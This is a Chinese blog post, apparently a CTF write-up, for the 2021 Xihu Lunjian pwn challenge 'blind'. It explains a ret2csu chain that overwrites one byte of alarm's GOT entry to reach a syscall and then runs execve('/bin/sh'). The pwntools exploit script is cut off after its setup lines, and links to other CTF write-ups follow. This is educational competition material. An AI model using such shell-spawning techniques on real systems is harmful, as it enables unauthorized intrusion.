2021 西湖论剑 pwn blind

最新推荐文章于 2025-02-18 20:27:53 发布
原创 最新推荐文章于 2025-02-18 20:27:53 发布 · 689 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文介绍了一种利用ret2csu技术来覆盖alarm的全局偏移表(GOT)的方法,并通过爆破手段将alarm指向系统调用,最终通过read函数设置rax寄存器值为0x5b,从而执行execve(/bin/sh0,0)获得shell。文章提供了一个Python编写的exp脚本实例。

在这里插入图片描述

利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。

通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0)

exp

#/usr/env/bin python
from pwn import *
import time

context.log_level = "debug"

gadget1 = 0x4007ba
gadget2 = 0x4007a0

elf = ELF('./blind')
read_got = elf.got['read']
read_plt = elf.plt['read']
alarm_plt = elf.plt['alarm']
alarm_got = elf.got['alarm']
bss_addr = elf
最低0.47元/天 解锁文章
西湖论剑——pwn
weixin_44319142的博客
04-07 653
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 830
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
[Pwn] Writeup - 2025西湖论剑 - Pwn
Lufiende的博客
02-10 182
西湖论剑2025 Pwn 方向 WriteUp
pwn-2019西湖论剑之story
CharlesGodX的博客
04-09 844
0x00:前言 这道题是64位程序,涉及到canary绕过,格式化字符串漏洞,是一道非常好的练习题 0x01:题目思路 首先检查保护,可以看到有堆栈不可执行和canary保护 Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec story [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/story' ...
2021西湖论剑wp
qq_48511129的博客
11-22 1965
web OA?RCE? ⽐赛的时候试了下不是弱⼝令(实际上就是admin123,但当时忘试这个了),所以就去⽹上找了改密码 的⽅式,⽤这⾥的⽅法:信呼oa最新版本代码审计 - ma4ter $test = $this->jm- >strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")), 'd41d8cd98f00b2...
2021西湖论剑
hezhing
12-09 419
2021西湖论剑 跟队打。第6。签到摸鱼。等官方wp复习那个机器学习的misc。 MISC 签到 YUSA的小秘密 打开是个图片,根据提示有可能是lsb隐写,用Stegsolve打开,在red0发现flag字样。但有几位模糊了。 想到了之前byte2020的一个[题](Docs (feishu.cn)),三个像素其实可以使用三个通道来表示的。常见的是rgb,题目描述说不止rgb,这里有个通道是YCrCb。我们可以使用cv2.cvtColor(img,cv2.COLOR_BGR2YCrCb)来直接对图片
2021西湖论剑中国杭州网络安全大赛技能概览
资源摘要信息:"西湖论剑2021中国杭州网络安全技能大赛.zip" 本次提供的文件包含了2021年在中国杭州举办的“西湖论剑网络安全技能大赛的竞赛资源,该大赛以Capture The Flag(CTF)的形式展开,针对不同领域的网络...
2024西湖论剑WP(reverse_MZ)
ZJPC007的博客
02-05 886
有函数可知,根据转换得到48位的字符串并进行SHA1加密,密文为dc0562f86bec0a38508e704aa9faa347101e1fdb。因为转换过程中有多种可能,所以需要进行一些手搓的步骤,逐渐得到flag。思路大概就是先进行转换然后SHA1加密。逆向板块就做出这一题。
西湖论剑2025 pwn
最新发布
yufeiyu66的博客
02-18 372
这里存在一个洞,vector+24是存放result的地方,连续push 7次就会把vector+24地方的改掉成我们输入的数字了。没有read 但是可以直接用mmap映射到空间上 ,write函数用\x90占位,然后正常syscall。这样就可以找到libc,后面就是利用edit劫持这个函数,改成system /bin/sh。题目映射了一段可以可读可写可执行的空间,并且调用执行这段空间。有两个防御,一个检查syscall只能调用两次,一个沙箱。因此,有可以直接用shellcraft生成一个提权的脚本。
西湖论剑2021中国杭州网络安全技能大赛.zip
12-07
CTF 西湖论剑 决赛 2021
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 1068
西湖论剑2022pwn
西湖论剑 pwn题解析(持续更新中)
qq_41071646的博客
04-12 1148
这篇文章是我在我志琦哥 我们工作室 负责人 旁边 我俩上数据库课 我看着他一步一步 搞出来的 太强了 不过现在应该还在和我一样自闭中。。。 这个题 有 canary 保护 然后这个题 思路就是 找到 canary的偏移 然后泄露libc 库 然后 获取 system 地址 x64 要找 pop 这里 获取到 puts函数的地址 但是这个题 并没...
[BUUCTF-pwn] 西湖论剑_2018_小陈的笔记本加强版
weixin_52640415的博客
01-04 366
难度到是没啥难度,需要设计一下块的布置。 菜单题,有add,free,居然还有edit和show(这个很少见了),管理块0x90,在0x70放size和ptr,这样控制ptr就基本OK了。 漏洞点: readnb函数有off_by_null unsigned __int64 __fastcall sub_400B8B(__int64 a1, int a2) { char buf; // [rsp+1Fh] [rbp-11h] BYREF int i; // [rsp+20h] [rbp-1
CTF Blind pwn题型学习笔记
lifanxin的博客
08-31 2564
Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结 概述   所谓Blind pwn,即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结,大概可以分为以下几类盲打pwn题:逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。 如何辨别漏洞类型   对于盲打题,首先第一步应该是判断属于哪种类型的盲打,判断的步骤也很简单,nc连上后,直接看程序提供的菜单功能。   一般来说,需要逻
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 846
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
西湖论剑 2023 比赛复现
shinygod的博客
02-11 1556
在copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有__proto__。在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代__proto__,最后打ejs就行了。
西湖论剑逆向
qq_41071646的博客
04-09 618
其实可以石锤我是标题党了 哈哈哈 其实这个我也很尴尬 ·~ 没有题目 没办法好好的去做一下题 但是听说安恒会有复现 复现的时候能够好好做也是极好的 然后 先说一下这个题 题目 其实是在https://www.52pojie.cn/thread-924174-1-1.html这个链接下载的 多谢师傅的分享 其实 testre 这个题 很简单的一个题 就是 怎...
2023西湖论剑--messageboard
m0_61948538的博客
03-03 422
沙箱&栈迁移
2021西湖论剑网络安全大赛部分WP
七堇年的博客
12-23 5243
2021西湖论剑网络安全大赛WP
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值